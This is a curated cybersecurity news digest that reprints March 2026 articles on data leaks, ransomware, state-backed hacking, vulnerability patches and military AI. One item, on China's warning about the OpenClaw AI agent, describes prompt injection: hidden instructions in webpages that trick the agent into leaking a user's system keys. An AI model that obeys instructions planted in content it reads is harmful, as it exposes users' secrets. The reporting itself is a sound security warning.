Cyberveille curated by Decio
Confidential health records from UK BioBank project exposed online | Genetics | The Guardian https://www.theguardian.com/science/2026/mar/14/confidential-health-records-exposed-online-uk-biobank
21/03/2026 14:26:19

theguardian.com
Hannah Devlin and Tom Burgis
Sat 14 Mar 2026 07.00 CET

Exclusive: Guardian investigation finds data from flagship medical research leaked dozens of times

Confidential health data has been exposed online on dozens of occasions, a Guardian investigation can reveal, raising questions about the safeguarding of patient records by one of the UK’s flagship medical research projects.

UK Biobank, which holds the medical records of 500,000 British volunteers, is one of the world’s most comprehensive stores of health information and is credited with driving breakthroughs in cancer, dementia and diabetes research. But scientists approved to access Biobank’s sensitive data appear to have sometimes been cavalier about its security.

The files, which seem to have been inadvertently posted online by researchers using the data, do not include names or addresses, but they may still pose privacy concerns. One dataset found by the Guardian contained millions of hospital diagnoses and associated dates for more than 400,000 participants.

With the consent of a Biobank volunteer, the Guardian was able to pinpoint what appeared to be extensive hospital diagnosis records for the volunteer, using only their month and year of birth and details of a major surgery they had undergone.

“The file was very detailed and it felt like a gross invasion of privacy even to glance at.” (Data expert)

One data expert said the scale and persistence of the problem was “shocking” at a time when AI and social media were making it ever easier to cross-reference information online.

UK Biobank rejected the concerns, saying that no identifying data, such as names and addresses, were provided to researchers.

In a statement, Prof Sir Rory Collins, the chief executive of UK Biobank, said: “We have never seen any evidence of any UK Biobank participant being re-identified by others.”

‘They said they would hold our data securely’
Founded in 2003 by the Department of Health and medical research charities, UK Biobank holds genome sequences, scans, blood samples and lifestyle information of 500,000 volunteers. Last month, the government extended Biobank’s access to volunteers’ GP records.

Scientists at universities and private companies across the world apply for access and, until late 2024, were free to download data directly on to their own computer systems.

Before this point, data had been inadvertently published online and Biobank appears to still be grappling with the problem.

The issue emerged because journals and funders increasingly require researchers to publish the code they have used to analyse large datasets. When intending to upload code, some researchers have also accidentally published partial or entire Biobank datasets to GitHub, a popular online code-sharing platform. UK Biobank prohibits researchers from sharing data outside their systems and says it has introduced further training for all researchers.

In the past year, the data leaks appear to have become a more urgent concern to UK Biobank. Between July and December 2025, it issued 80 legal notices to GitHub, which has complied with requests to remove data from the internet. Yet much still remains available.

Some of the data files contain just patient IDs, or test results for small numbers, others are more extensive. One dataset found online by the Guardian in January contained hospital diagnoses and associated diagnosis dates for about 413,000 participants, along with their sex and month and year of birth.

A data expert who reviewed the file said: “It sent shivers down my spine to even open. I deleted the file immediately. It was very detailed and felt like a gross invasion of privacy even to glance at.”

To test the risk of re-identification, the Guardian approached several Biobank volunteers, two of whom had undergone medical procedures within the timeframe covered by the data and agreed to share these details with an external data scientist.

One volunteer, who provided treatment dates for a fracture and seizure, could not be located in the dataset. A second volunteer, a woman in her 70s, shared her month and year of birth and the month and year she had a hysterectomy. Only one person in the dataset matched these details. The apparent match was corroborated by five other diagnoses from the records that the volunteer had not initially disclosed.

“Effectively you were rehearsing the main parts of my medical history to me without me having given you any information at all. I didn’t expect that,” the volunteer said.

The woman said she was not too concerned about her own data being exposed and intended to remain a participant, saying that she viewed UK Biobank’s work as “extremely important”. But, she added: “I’m more concerned about whether Biobank has broken its agreement with people. They said they would hold our data securely … I just feel as though that has to come into the equation.”

UK Biobank said the re-identification scenario tested by the Guardian did not highlight a privacy risk because without additional information it would be impossible to identify individuals.

A Biobank spokesperson said: “As we have communicated to our participants, including on our website: ‘If a participant puts information that reveals something about their health and identity, such as genealogy data, on a public website, this could make it possible for their identity to be discovered by cross-referencing UK Biobank research data.’

“You have simply demonstrated why we tell participants not to do this.”

The spokesperson added that Biobank had taken extensive measures to protect participants’ privacy, including proactively searching GitHub, contacting researchers directly and issuing legal takedown notices, actions which they said had led to about 500 repositories being removed. Many of these, it said, contained only patient IDs, not health data.

“The idea they can rely on volunteers never putting any other information out about themselves is entirely unreasonable.” (Prof Felix Ritchie)

‘There are tensions between driving research with data and protecting privacy’
Privacy experts said UK Biobank’s approach appeared at odds with the reality that many people, reasonably, shared some health information online and that in an age of AI this could readily be identified and cross-referenced.

“Are these people aware that the internet exists?” asked Prof Felix Ritchie, an economist at the University of the West of England. “The idea that they can rely on their volunteers never putting any other information out there about themselves is an entirely unreasonable thing to expect.”

Dr Luc Rocher, associate professor at the Oxford Internet Institute, who reviewed several Biobank datasets found online, said that removing identifiers often did not guarantee anonymity and that simply knowing a person’s birthday and, say, the date they broke a leg might be enough to pinpoint their record with high confidence.

“Once identified, that record could reveal sensitive information such as a psychiatric diagnosis, an HIV test result, or a history of drug abuse,” they said.

Prof Niels Peek, professor of data science and healthcare improvement at the University of Cambridge, said the scale of the problem was “shocking”. “If it had happened once or 10 times I’d probably say: ‘It’s not great that it’s happened but at the same time zero risk is impossible,’” he said. “Hundreds. That’s a little bit too much.”

In Peek’s view, Biobank’s actions show it has taken the issue seriously and “done everything that one can reasonably expect”. But, he added: “The scale and persistence with which this has happened demonstrates that there are huge tensions between the ambition to drive health research with data at scale and the legal and ethical imperative to protect people’s privacy.”

Experts questioned whether Biobank will be able to fully regain control of the data released online. Despite researchers and GitHub having taken down most of the offending repositories in response to Biobank’s requests, many of the relevant files remained available on a code archive website until shortly before publication.

theguardian.com EN 2026 dataleak medical research health UK BioBank
Oracle EBS Hack: Only 4 Corporate Giants Still Silent on Potential Impact https://www.securityweek.com/oracle-ebs-hack-only-4-corporate-giants-still-silent-on-potential-impact/
21/03/2026 14:20:07

securityweek.com
By Eduard Kovacs | March 16, 2026 (11:44 AM ET)

Several global giants listed as victims of the recent hacking campaign targeting Oracle E-Business Suite (EBS) customers have remained mum on the impact of the cybersecurity incident.

The Cl0p ransomware and extortion group has taken credit for the EBS hacking campaign, which involved exploiting zero-day vulnerabilities to access data stored by organizations in Oracle’s enterprise management software. The compromised data was then leveraged for extortion.

While Cl0p serves as the public-facing extortion brand for the campaign, the cybersecurity community believes the operation may have been driven by a cluster of threat actors, most notably FIN11.

The hackers have listed more than 100 alleged victims of the Oracle EBS campaign on the Cl0p leak website, including organizations in sectors such as technology, telecommunications, software, heavy industry, manufacturing, engineering, retail, consumer goods, energy, utilities, media, finance, and entertainment.

For most of the victims, the cybercriminals published torrent files pointing to information allegedly stolen from their systems. This indicates that these victims have refused to pay a ransom.

A majority of the large organizations targeted in the campaign have issued a public statement confirming a data breach. Many claimed that the impact of the incident is limited, but still notified affected individuals about the potential risks.

However, a handful of very large companies do not appear to have issued any public statements on the matter, neither to confirm nor deny being hit, nor even to say that an investigation is being conducted.

This includes semiconductor and infrastructure software company Broadcom, engineering and construction firm Bechtel, cosmetics group Estée Lauder Companies, and medical devices and healthcare solutions provider Abbott Laboratories.

They were all listed on the Cl0p website on or around November 20, 2025.

It may take several months and even as much as a year for companies to investigate data breaches and determine their full extent. However, major companies typically acknowledge at least that an investigation is ongoing.

Broadcom, Bechtel, Estée Lauder, and Abbott have not responded to repeated requests for comment.

Data leaked by hackers
SecurityWeek has not downloaded any of the leaked data, but has conducted a brief metadata and file-tree analysis of data allegedly obtained from some of the larger companies named on the Cl0p website and found that the files indeed originate from an Oracle EBS environment.

In the case of Broadcom, the cybercriminals made public more than 2TB of archives allegedly storing files stolen from the company. The Estée Lauder torrent file points to 870GB of archive files.

At the time of writing, the torrents pointing to Bechtel and Abbott files are still available, but no data could be retrieved for analysis. However, that does not mean the files are no longer accessible to cybercriminals, as they may also be circulated privately on underground forums.

On the one hand, cybercrime groups like Cl0p frequently exaggerate the scope of their breaches, prompting many companies to quickly issue statements denying or downplaying the allegations to reassure customers and stakeholders that any impact was limited.

Moreover, if no regulated data (such as health information, Social Security numbers, or payment details) was compromised, companies face no legal obligation to disclose the incident publicly. If the breach did not qualify as material, there is also no requirement under SEC rules to report it to investors.

On the other hand, some organizations may deliberately maintain silence for strategic, PR, and legal reasons. Even acknowledging an ongoing investigation could invite lawsuits, short-seller pressure, or additional regulatory scrutiny.

securityweek.com EN 2026 Oracle-E-Business-Suite hack Cl0p ransomware EBS
Cyberattack on vehicle breathalyzer company leaves drivers stranded across the US https://techcrunch.com/2026/03/20/cyberattack-on-vehicle-breathalyzer-company-leaves-drivers-stranded-across-the-us
21/03/2026 14:15:33

techcrunch.com
Zack Whittaker
8:01 AM PDT · March 20, 2026

A cyberattack on a U.S. car breathalyzer company has left drivers across the United States reportedly stranded and unable to start their vehicles.

The company, Intoxalock, says on its website that it is “currently experiencing downtime” after a cyberattack on March 14. Intoxalock sells breathalyzer devices that fit into vehicle ignition switches and are used by people who are required to provide a negative alcohol breath sample to start their car.

Intoxalock spokesperson Rachael Larson confirmed to TechCrunch that the company had been hit by a cyberattack. Larson said the company took steps to “temporarily pause some of our systems as a precautionary measure.”

These breathalyzer devices need to be calibrated every few months, but the cyberattack has left Intoxalock unable to perform these calibrations. The company said customers whose devices require calibration may experience delays starting their vehicles.

Drivers posting on Reddit say that cars are unable to start if they miss a calibration, effectively locking drivers out of their vehicles.

According to local news reports across Maine, drivers are experiencing lockouts and some have been unable to start their vehicles. One auto shop in Middleboro told WCVB 5 in Boston that it has had cars parked in its lot all week due to the cyberattack.

News reports from across the United States show drivers are affected from New York to Minnesota, and drivers have been unable to drive because their vehicle-based breathalyzers cannot be immediately calibrated.

Intoxalock would not say what kind of cyberattack it was experiencing, such as whether it involved ransomware or a data breach, or whether it had received any communications from the hackers, including any ransom demands. The company’s technology is used in 46 states, its website says, and it claims to provide services to 150,000 drivers every year.

Intoxalock did not provide an estimated timeline for its recovery.

techcrunch.com EN 2026 alcohol cybersecurity data breach Security Transportation
FBI, CISA issue PSA on Russian intelligence campaign to target messaging apps https://cyberscoop.com/fbi-cisa-issue-psa-on-russian-intelligence-campaign-to-target-messaging-apps/
21/03/2026 11:08:33

cyberscoop.com
By Tim Starks

March 20, 2026

It echoes earlier alerts from the Netherlands and Germany, and is the latest to warn about targeting of Signal users and others.

Russian intelligence-affiliated hackers have gained access to thousands of users’ messaging apps with a global phishing campaign, the FBI and the Cybersecurity and Infrastructure Security Agency warned in a public service announcement on Friday.

The high-value targets they’re pursuing include current and former U.S. government officials, political figures, military personnel and journalists, the two agencies said in the joint PSA about the hackers’ attempts to infiltrate commercial messaging applications (CMAs).

The U.S. alert comes on the heels of an earlier warning from Dutch authorities, who said last week that Russian hackers were “engaged in a large-scale global attempt” to take over WhatsApp and Signal accounts. The Dutch warning likewise followed a similar warning from Germany in February.

The U.S. agencies emphasized that the hackers had not been able to bypass end-to-end encryption, instead manipulating users into giving up access. The scheme involves hackers posing as Signal help personnel, then inviting users to click a link or provide verification codes or their account personal identification number.

“After compromising an account, malicious actors can view the victims’ messages and contact lists, send messages, and conduct additional phishing against other CMA accounts,” the PSA explains. “(Note: reporting shows that the threat actors specifically target Signal accounts but can apply similar methods against other CMAs).”

However, “CMA users who strengthen their personal cybersecurity and defend against social engineering attempts can reduce the risk of account compromise and limit the effectiveness of the threat actors’ current tactics, techniques, and procedures,” the agencies said.

The Russian campaign is just the latest to seek to bypass the protections commercial messaging apps offer. CISA in November warned about spyware targeting of messaging apps.

There sometimes has been a Russian intelligence nexus to the recent targeting. Google Threat Intelligence Group shined a spotlight last year on Russian attempts to target Signal users in Ukraine.

“We anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war,” the company said.

CISA FBI Netherlands phishing Russia signal Ukraine WhatsApp germany Google messaging apps
Salt Typhoon is hacking the world's phone and internet giants — here's everywhere that's been hit https://techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants/
15/03/2026 13:06:28

techcrunch.com
Zack Whittaker
8:50 AM PDT · March 9, 2026

Salt Typhoon is by far one of the most prolific hacking groups in recent years, breaching some of the top American phone companies. Here are all the countries that have been targeted.

Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials.

The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China prepare for an eventual war with Taiwan, according to researchers. U.S. officials have called China’s potential invasion of Taiwan an “epoch-defining threat.” Much of the group’s efforts have focused on hacking Cisco routers at the edge of a company’s network to break in, and on taking control of the surveillance devices that U.S. telecom companies are legally required to install to allow law enforcement to monitor calls and messages.

While Salt Typhoon is focused on hacking telecom infrastructure, other China-backed groups like Volt Typhoon are prepositioning for destructive cyberattacks capable of causing widespread disruption, and Flax Typhoon runs a botnet of hijacked internet-connected devices for hiding the hackers’ malicious internet traffic.

But Salt Typhoon is by far one of the most prolific hacking groups in recent years, including targeting some of the top American phone companies.

The hacks allowed China to obtain call records, text messages, and captured phone audio from senior U.S. officials, many of whom were considered government targets of interest. This prompted the FBI to urge Americans to switch to end-to-end encrypted messaging apps, fearing that a foreign adversary could eavesdrop on their communications.

Salt Typhoon went even further, hacking at least 200 companies around the world, according to FBI officials. The list of affected countries keeps growing.

Here are the countries that have attributed hacks to Salt Typhoon.

United States
Some of the top U.S. phone companies, including AT&T and Verizon, were confirmed hacked by Salt Typhoon, as was internet provider CenturyLink (now Lumen). T-Mobile said it was targeted but that the hackers had no access to its customers’ calls, text messages, or voicemails.

Satellite communications giant Viasat was also compromised, allowing hackers to gain access to tools used by law enforcement to access the communications of others.

Internet and data providers Charter Communications (Spectrum) and Windstream were also named as Salt Typhoon victims. Fiber network giant Consolidated Communications was reportedly hacked as part of the campaign.

The hackers didn’t just target phone and internet providers. Per several reports, Salt Typhoon compromised the networks of a U.S. state’s National Guard, allowing them to steal data and gain access to other networks in every other U.S. state and several territories.

North and South America
According to security firm Recorded Future, its researchers have seen Salt Typhoon target Cisco devices associated with universities in Argentina and Mexico and elsewhere.

Meanwhile, the Canadian government confirmed that its top telecommunications firms were hacked by China as part of Salt Typhoon’s extended espionage campaign. Canada also confirmed several Cisco routers at one telecom giant were hacked to steal data from the company.

The government in Ottawa warned it saw targeting of companies that were “broader than just the telecommunications sector.”

Trend Micro said it saw Salt Typhoon activity in Brazil, the most populous country in South America.

Asia, Africa, and Oceania
Recorded Future said it’s seen Salt Typhoon targeting at least one Myanmar-based telecoms provider, Mytel, by way of hacked Cisco routers, as well as a South African telecommunications provider. It’s also seen attacks targeting routers of universities across Bangladesh, Indonesia, Malaysia, and Thailand.

Japan has also warned of the threat of Salt Typhoon to its networks.

Both the governments of Australia and New Zealand say they’ve seen Salt Typhoon activity in their telecom and critical infrastructure sectors. New Zealand said it also saw Salt Typhoon hackers across the government sector, as well as transportation, lodging, and military infrastructure networks.

Trend Micro also said it found at least 20 compromised organizations across the telecoms, consulting, chemical, and transportation industries, as well as government agencies and nonprofits in various countries, including Afghanistan, Eswatini, India, Taiwan, and the Philippines.

Europe
The British government has confirmed that a “cluster of activity” from Salt Typhoon was seen across the United Kingdom. While the activity wasn’t specified, news reporting suggests that senior U.K. government staff may have had their phone records tapped and text messages read.

Norway has also confirmed Salt Typhoon hacked several organizations in the country.

Dutch authorities in the Netherlands say that several smaller internet providers and web hosts were targeted and that the hackers gained access to their routers, but their internal networks were not compromised.

An Italian internet provider was hacked, per Recorded Future.

And, according to Czech cybersecurity officials, incidents related to Salt Typhoon hacks have been witnessed in Finland and Poland.

techcrunch.com EN 2026 Salt-Typhoon telecoms
Ericsson US discloses data breach after service provider hack https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
15/03/2026 13:03:35

bleepingcomputer.com
By Sergiu Gatlan
March 9, 2026

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide.

In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025.

After detecting the incident, the third-party vendor notified the FBI and hired external cybersecurity experts to assess the extent of the breach and its impact.

The investigation, which was completed last month, found that a total of 15,661 individuals had their data exposed in the incident. However, Ericsson noted that the compromised provider has yet to find evidence that the data has been misused since the breach.

"Based on the investigation, our service provider determined that a limited subset of files may have been accessed or acquired without authorization between April 17, 2025 and April 22, 2025," Ericsson said.

"As part of its investigation, it retained external data specialists to conduct a comprehensive review of the potentially affected files to identify any personal information. That review was completed on February 23, 2026, at which time we determined that some of your personal information was contained within the affected files."

According to a separate filing with the Texas Attorney General, the exposed information includes affected individuals' names, addresses, Social Security numbers, driver’s license numbers, government-issued ID numbers (e.g., passport, state ID cards), financial information (e.g., account numbers, credit or debit card numbers), medical information, and dates of birth.

Ericsson is now providing free IDX identity protection services, including credit monitoring, dark web monitoring, identity theft recovery, and a $1 million identity fraud loss reimbursement policy to affected people who enroll by June 9, 2026.

Although the company flagged this incident as a data theft attack, no cybercrime group has taken responsibility for the breach. This raises the possibility that either the third-party vendor paid the ransom demanded by the attackers or that the threat actors were unable to connect the breach to Ericsson.

When BleepingComputer reached out for more details on the breach, including the total number of affected individuals, an Ericsson spokesperson said they didn't have "anything to share beyond the letter."

Update March 10, 06:39 EDT: In a filing with Maine's Attorney General, Ericsson says the breach affects a total of 15,661 individuals.

bleepingcomputer.com EN 2026 Data-Breach Data-Theft Ericsson Telecommunications USA
Tel Aviv train station hit by cyberattack with fake missile alerts | Ctech https://www.calcalistech.com/ctechnews/article/rkuy5flcbx
15/03/2026 12:57:40

calcalistech.com
Hofit Cohen Azulay
12:55, 12.03.26

Cyberattack affects platform advertising screens; national cybersecurity authorities investigate.

A cyberattack targeted advertising signs in the passenger halls at Herzliya Station and Shalom Train Station in Tel Aviv on Wednesday. It is estimated that Iranian hackers took control of the signs and posted messages claiming that the stations were expected to be attacked by Iranian missiles and instructing the public to evacuate immediately.
Israel Railways clarified that these signs are not connected to the railway infrastructure and are located on platforms as part of a private provider’s advertising and information system. Shortly after the incident, the screens were taken offline. The National Cyber Directorate, in cooperation with Israel Railways, began investigating the source of the malfunction. Railways officials emphasized that the affected screens are part of an external network unrelated to essential railway infrastructure. Therefore, there was no risk to critical systems or the railway's passenger information system (PIS).

Earlier, Iran’s Fars News Agency falsely claimed that Israel’s entire railway system had been hacked and disabled. The agency stated:
"Israel’s railways have been hacked. As a result of a cyberattack, the enemy’s railway system has been disabled. All [Israeli railway] stations are not safe until further notice."

Following the incident, Israel Railways announced on Thursday that, in accordance with Home Front Command guidelines, it is continuing efforts to resume service on travel routes, increase train frequency, and reopen additional stations.

calcalistech.com EN 2026 Israel Tel-Aviv cyberattack targeted advertising-signs
China issues second warning on OpenClaw risks amid adoption frenzy https://www.scmp.com/tech/tech-trends/article/3346138/china-issues-second-warning-openclaw-risks-amid-adoption-frenzy
15/03/2026 12:49:46

scmp.com
Ben Jiang in Beijing
Published: 10:14pm, 10 Mar 2026

Cybersecurity agency cautions that improper installation and use of the AI agent carry severe security and data risks.

China’s cybersecurity agency on Tuesday issued a second warning about security and data risks tied to OpenClaw, despite a rush among local governments and tech companies to adopt the artificial intelligence agent amid a nationwide frenzy.

At a time when major Chinese cloud service providers were touting easy deployment of OpenClaw to capitalise on its popularity, improper installation and use of the agent had also led to severe security risks, said the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT), a non-governmental and non-profit cybersecurity technical platform, in a notice published on its WeChat account.

Released by Austrian developer Peter Steinberger late last year, OpenClaw is a software that is taking the world by storm for its ability to perform tasks on a user’s behalf, organising and responding to emails, drafting work reports and preparing slide decks.

CNCERT partly blamed OpenClaw’s security challenges on its ability to perform tasks autonomously, which required high-level permissions that heightened exposure to breaches.

The agency said OpenClaw was vulnerable to threats including “prompt injection”, in which attackers embed hidden malicious instructions in webpages which, when read by the software, could trick it into leaking a user’s system keys.

It was also prone to “operational errors”, in which the agent may misinterpret user commands and unintentionally delete critical information, including emails and important files, potentially causing significant data loss.

scmp.com EN 2026 Changshu National-Vulnerability-DataBase OpenClaw China AI Ministry-of-Industry-and-Information-Technology CNCERT
Veeam warns of critical flaws exposing backup servers to RCE attacks https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/
13/03/2026 11:19:47

bleepingcomputer.com
By Sergiu Gatlan
March 12, 2026

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication (VBR) solution, including four critical remote code execution (RCE) vulnerabilities.

VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures.

Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks.

The fourth one (tracked as CVE-2026-21708) allows a Backup Viewer to gain remote code execution as the postgres user.

Veeam also addressed several high-severity security bugs that can be exploited to escalate privileges on Windows-based Veeam Backup & Replication servers, extract saved SSH credentials, and bypass restrictions to manipulate arbitrary files on a Backup Repository.

These vulnerabilities were discovered during internal testing or reported through HackerOne and are resolved in Veeam Backup & Replication versions 12.3.2.4465 and 13.0.1.2067.

Veeam also warned admins to upgrade the software to the latest release as soon as possible, since threat actors often begin developing exploits shortly after patches are released.

"It's important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software," the company warned. "This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay."

VBR servers targeted in ransomware attacks
VBR is popular among managed service providers and mid-sized to large enterprises, even though ransomware gangs commonly target VBR servers because they can serve as a quick jumping-off point for lateral movement within breached networks, simplify data theft, and make it easy to block restoration efforts by deleting victims' backups.

The financially motivated FIN7 threat group (which previously collaborated with the Conti, REvil, Maze, Egregor, and BlackBasta ransomware groups) and the Cuba ransomware gang have both been linked to past attacks targeting VBR vulnerabilities.

Sophos X-Ops incident responders also revealed in November 2024 that Frag ransomware exploited another VBR RCE bug disclosed two months earlier and also used in Akira and Fog ransomware attacks starting in October 2024.

Veeam says its products are used by more than 550,000 customers worldwide, including 74% of Global 2,000 firms and 82% of Fortune 500 companies.

bleepingcomputer.com EN 2025 Backup RCE Remote-Code-Execution Veeam Veeam-Backup-&-Replication Vulnerability
Iran Includes American Tech Giants on List of New Targets https://gizmodo.com/iran-includes-american-tech-giants-on-list-of-new-targets-2000732530
13/03/2026 08:46:24

Gizmodo
By Ece Yildirim
Published March 11, 2026

State-aligned media released a list naming the offices of Microsoft, Palantir, and more as potential targets of military action.
A news agency affiliated with the Iranian regime released a list of American tech companies with links to American and Israeli military operations as new targets for Iran on Wednesday.

According to Al Jazeera, the Tasnim News Agency’s report lists Microsoft, Google, Palantir, IBM, Nvidia, and Oracle’s offices and cloud infrastructure in Israel and some Gulf countries as the new targets.

On top of targeting the tech giants, a spokesperson for a group owned by Iran’s Islamic Revolutionary Guard Corps told Al Jazeera that American and Israeli economic centers and banks in the region are also legitimate targets now, and warned people to “not be within a one-kilometre radius of banks.”

The list comes on the heels of an Israeli attack on a bank in Iran’s capital city of Tehran, according to Tasnim News Agency, which expanded “the scope of the regional war” to an “infrastructure war.”

The United States and Israel began their military campaign against Iran at the end of last month, with Iran responding with retaliatory strikes on Israeli soil and on American military bases in the region from Cyprus and Turkey to the Gulf countries.

As the war entered its 12th day, more than 1,300 civilians in Iran have been killed, including 175 people (most of them children) at an elementary school in southern Iran, reportedly struck by American missiles.

All six of the tech giants named by Iranian media have lucrative partnerships with the Pentagon and/or Israel. Nvidia is building data centers and a research and development campus in Israel, a country that CEO Jensen Huang has recently called “Nvidia’s second home.” Microsoft, Google, Palantir, IBM, and Oracle all have a close history with the Israeli government and military, with some reports claiming that the AI technology provided by these American tech giants is aiding the army in the mass surveillance of Palestinians. Meanwhile, Google, Oracle, IBM, Microsoft, and Palantir also have military AI agreements with the Pentagon.

Though not named by Tasnim, another American tech giant with ties to both American and Israeli military operations is Amazon. One of the company’s operating facilities in Bahrain and two of its data centers in the United Arab Emirates were heavily damaged earlier this month following Iranian drone strikes. The strikes, which Iranian state media later described as targeted, led to power disruptions and degraded AWS applications in the region.

So far, Iran’s military actions have been limited to the region. That could change, according to an ABC News report also from Wednesday, as the FBI has claimed Iran could launch drone strikes on the West Coast of the United States, where the headquarters of tech giants like Google, Nvidia, and Microsoft are located. But the chances of that happening are very slim, as even President Trump himself has said he is not worried, and the Iranian report explicitly threatens damage to the offices and infrastructure that these tech companies have in the Middle East.

gizmodo.com EN 2026 US-Israel-Iran-War Tech-Giants targets
How AI Is Turbocharging the War in Iran https://www.wsj.com/tech/ai/how-ai-is-turbocharging-the-war-in-iran-aca59002?st=tkAocR&reflink=desktopwebshare_permalink
09/03/2026 06:45:26

WSJ wsj.com
By Daniel Michaels and Dov Lieber

March 7, 2026 12:00 pm ET

The U.S. and Israeli attacks on Iran have unfolded at unprecedented speed and precision thanks to months of planning, a massive assemblage of military force and a cutting-edge weapon never before deployed on this scale: artificial intelligence.

AI tools are helping gather intelligence, pick targets, plan bombing missions and assess battle damage at speeds not previously possible. AI helps commanders manage supplies of everything from ammunition to spare parts and lets them choose the best weapon for each objective.

Before Israeli jet fighters launched ballistic missiles that killed Iran’s Supreme Leader Ali Khamenei at his residence a week ago, launching the current regional war, Israeli intelligence services had for years been monitoring hacked Tehran traffic cameras and eavesdropping on senior officials’ communications—increasingly relying on AI to sift through a flood of intercepts.

The use of AI in the campaign against Iran follows years of work by the Pentagon and lessons learned from other militaries. Ukraine—with U.S. help—increasingly relies on AI in its war against Russia. Israel has tapped AI in conflicts at least since the October 2023 Hamas attacks.

Defense Secretary Pete Hegseth has urged accelerated adoption of AI to create “an ‘AI-first’ warfighting force.” At the same time, he is engaging in a public battle with Anthropic, a critical AI supplier, and the Pentagon has contracted with rival OpenAI to use its models in classified settings. President Trump has ordered the government to stop using Anthropic’s products. But U.S. officials say the fight unfolding in Iran is showing the usefulness of Anthropic’s AI agent, Claude.

The U.S. and Israel have declined to discuss exactly how they are employing AI in the widening conflict, but recent comments from military leaders and technical experts provide a window.

Most military AI applications aim to give commanders and planners more complete information, faster than is now possible. That, in turn, should let them make better and quicker decisions than the enemy can, gaining a battlefield advantage.

The U.S. says it has struck more than 3,000 targets in Iran since the attacks began Saturday, using an array of weapons including attack drones launched from ships, F-22 jet fighters taking off from Israel and B-2 stealth bombers flying from the U.S.

While the complexity of managing so many aircraft and weapons is getting a boost from AI, its use remains limited and the cost of badly informed decisions remains high. U.S. military investigators believe American forces likely were responsible for a strike on the war’s first day that killed dozens of children at a girls’ elementary school in Iran, The Wall Street Journal reported.

Talk of military AI can conjure images of killer robots, but the reality is that its biggest uses now are often off the battlefield, in time-consuming and labor-intensive fields like intelligence, mission planning and logistics.

These noncombat areas are ripe for AI-inspired efficiency because out of every 10 people in the military, at most two face combat. Up to 90% of personnel are in support roles.

The Pentagon’s AI tools are similar to ChatGPT and other mass-market large language models, but limited to warfare and trained to tackle specific tasks using relevant information, seeking to avoid glitches and inaccuracies often besetting AI.

Still, war is among the most chaotic and complex human endeavors—posing unique problems for even the cutting edge of robotic thinking. The Pentagon’s first AI chief, retired Air Force Lt. Gen. Jack Shanahan, said building military AI is tough in part because much of the available data for training is out of date or unclear.

“The Department of Defense was built as a hardware company in the industrial age, and it has struggled to become a digital company in a software-centric era,” said Shanahan, who oversaw an AI-powered project in Iraq, dubbed Maven, almost a decade ago.

Military strikes start with intelligence. Gathering and parsing it can require thousands of analysts grinding for hours over communications intercepts, photographs and radar images as they try to divine the locations of missile launchers, tunnels and other targets.

Human analysts can examine at most 4% of the intelligence material that is typically collected, say U.S. officers who have worked in the field.

“The biggest immediate impact of AI is in intelligence,” said Israeli Col. Yishai Kohn, the defense ministry’s head of planning, economics and IT. “Many potential missions simply never happened because the manpower didn’t exist” to assess vital intelligence, said Kohn.

AI-powered machine vision can now quickly find vast numbers of targets—with the ability to single out specific models of aircraft or vehicles. It can listen for and summarize relevant conversations from intercepts.

“Intelligence agencies already have access to tons of video data, and current AI enables them to detect exactly what they need within an ocean of data,” said Matan Goldner, chief executive of Conntour, an Israeli company selling software to its and other countries’ security agencies that allows them to query video databases the same way LLMs are used to find patterns in texts.

Just as with mass-market AI, users can bore into results with queries, such as to identify every missile launcher located near a hospital. They can also set the system to alert when an event happens, such as “Tell me every time someone takes a photo near this military base.”

The U.S. Army’s 18th Airborne Corps, using software from data company Palantir Technologies in a continuing string of exercises dubbed Scarlet Dragon, matched its own record from Iraq as the military’s most efficient targeting operation ever, according to Emelia Probasco, a senior fellow at Georgetown University’s Center for Security and Emerging Technology. Thanks to AI, the corps achieved that with only 20 people, compared with more than 2,000 staffers employed in Iraq, she said.

Militaries in the North Atlantic Treaty Organization are using AI to track Russia’s shadow fleet of tankers, scanning millions of square miles several times a day for vessels that are illegally transferring fuel at sea, said French Adm. Pierre Vandier, NATO’s top officer for digital transformation. Imagery is then linked to ship identities for closer tracking and potential action, he said.

Vandier said AI is turning military intelligence analysis from a task of groping in darkness for targets to one of sifting through piles of them. “The number of targets you can nominate through AI is just skyrocketing,” Vandier said.

To prioritize targets and develop a course of action, the Pentagon is increasingly using AI to run models and digital wargames. In one of many efforts, last year it contracted with Pittsburgh-based Strategy Robot to develop advanced systems that can churn through vast numbers of scenarios despite imperfect information. From potentially millions of iterations, planners can zoom in on actions that are more likely to achieve their objectives.

In the pre-AI world, after rough outlines were agreed on for an operation, commanders and specialists would develop mission plans, compiling paper-stuffed binders in a weekslong exercise. AI can potentially do the same work in days, military leaders say.

Planning any military assault—from the fast, targeted mission in January to seize Venezuelan strongman Nicolás Maduro to the war with Iran—brings together subject-matter specialists including intelligence officers, combat commanders, weapons experts and logistics managers. Sessions can include around 40 people.

“The more people you add into planning, the longer it takes,” said a U.S. Army officer in Europe with experience in the process.

As preparations advance and plans evolve, each specialist revises their own plans, with knock-on effects for the others. If intelligence reports, for example, shift a bombing target to a more-distant objective, commanders may opt to use different aircraft or weapons, which in turn can affect crew rostering, flight planning and fuel consumption.

